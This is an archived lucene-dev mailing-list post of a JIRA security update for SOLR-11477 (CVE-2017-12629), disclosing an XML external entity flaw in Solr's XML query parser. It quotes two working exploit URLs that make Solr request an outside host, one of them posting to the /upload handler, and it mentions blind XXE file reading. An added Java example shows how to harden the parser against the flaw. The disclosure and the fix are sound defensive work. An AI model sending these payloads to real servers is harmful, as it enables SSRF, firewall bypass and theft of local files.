lucene-dev mailing list archives

From "Uwe Schindler (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (SOLR-11477) CVE-2017-12629: Disable external entities in XML query parser
Date Wed, 18 Oct 2017 12:23:00 GMT

     [ https://issues.apache.org/jira/browse/SOLR-11477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Uwe Schindler updated SOLR-11477:
---------------------------------
    Security: Public  (was: Private (Security Issue))

> CVE-2017-12629: Disable external entities in XML query parser
> -------------------------------------------------------------
>
>                 Key: SOLR-11477
>                 URL: https://issues.apache.org/jira/browse/SOLR-11477
>             Project: Solr
>          Issue Type: Task
>      Security Level: Public(Default Security Level. Issues are Public) 
>          Components: query parsers, security
>            Reporter: Christine Poerschke
>            Assignee: Uwe Schindler
>            Priority: Blocker
>             Fix For: 5.5.5, 7.1, 7.2, master (8.0), 6.6.2
>
>         Attachments: SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch
>
>
> Lucene includes a query parser that is able to create the full spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports the "xml" query parser in the search query.
> The problem is that the lucene xml parser does not explicitly prohibit doctype declarations and expansion of external entities. It is possible to include special entities in the xml document that point to external files (via file://) or external urls (via http://):
> Example usage:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'}
> {noformat}
> When Solr is parsing this request, it makes an HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as the DOCTYPE definition.
> Considering that we can define the parser type in the search query, which very often comes from untrusted user input, e.g. search fields on websites, it allows an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions.
> For example, this vulnerability could be used to send malicious data to the '/upload' handler:
> {noformat}
> http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'}
> {noformat}
> This vulnerability can also be exploited as Blind XXE using the ftp wrapper in order to read arbitrary local files from the solr server.
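The mitigation the issue title asks for, shown as an added Java example that is neither Solr's own patch (that is in the attachments) nor part of this message: a DocumentBuilderFactory configured to reject DOCTYPE declarations outright and, as defence in depth, to never resolve external entities or load an external DTD. It is exercised on a plain XML query and on the shape of the DOCTYPE payload quoted above, with the hostname replaced by a placeholder so no network request is ever made. The class and method names, the sample query and the placeholder host are assumptions made for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

public class HardenedXmlQueryParsing {

    // Constructed sample: same shape as the DOCTYPE payload in the report, but pointed at a
    // placeholder host (assumption, not a real target). The hardened parser never contacts it.
    static final String DOCTYPE_PAYLOAD =
        "<!DOCTYPE a SYSTEM \"http://PLACEHOLDER-HOST.invalid/xxx\"><a></a>";

    // Constructed sample of a harmless XML query fragment that must keep working.
    static final String PLAIN_QUERY = "<TermQuery fieldName=\"title\">lucene</TermQuery>";

    /** Builds a DocumentBuilder that refuses DOCTYPEs and never resolves external entities. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Primary control: any DOCTYPE declaration is a fatal parse error. This alone
        // stops both the SSRF payload and blind XXE variants described in the report.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth, in case the feature above is ever relaxed: do not fetch
        // external general or parameter entities, and do not load an external DTD.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        DocumentBuilder db = dbf.newDocumentBuilder();
        // Last line of defence: if a resolver is consulted at all, hand back an empty
        // entity instead of opening a file or URL.
        db.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
        return db;
    }

    /** Returns true if the XML parses to a document, false if the parser rejects it. */
    static boolean parses(DocumentBuilder db, String xml) {
        try {
            Document doc = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement() != null;
        } catch (SAXException | IOException e) {
            // disallow-doctype-decl surfaces as a SAXParseException here.
            return false;
        }
    }

    public static void main(String[] args) throws Exception {
        DocumentBuilder db = hardenedBuilder();
        System.out.println("plain query accepted:    " + parses(db, PLAIN_QUERY));
        System.out.println("DOCTYPE payload accepted: " + parses(db, DOCTYPE_PAYLOAD));
    }
}
```

The feature URIs are the ones understood by the Xerces-derived parser bundled with the JDK; a different JAXP implementation may not recognise every one of them, so a deployment should fail closed (refuse to build the parser) rather than swallow the ParserConfigurationException. Rejecting the DOCTYPE is the control that matters: the query parser has no legitimate use for a DTD, so there is nothing to lose by forbidding it.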



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


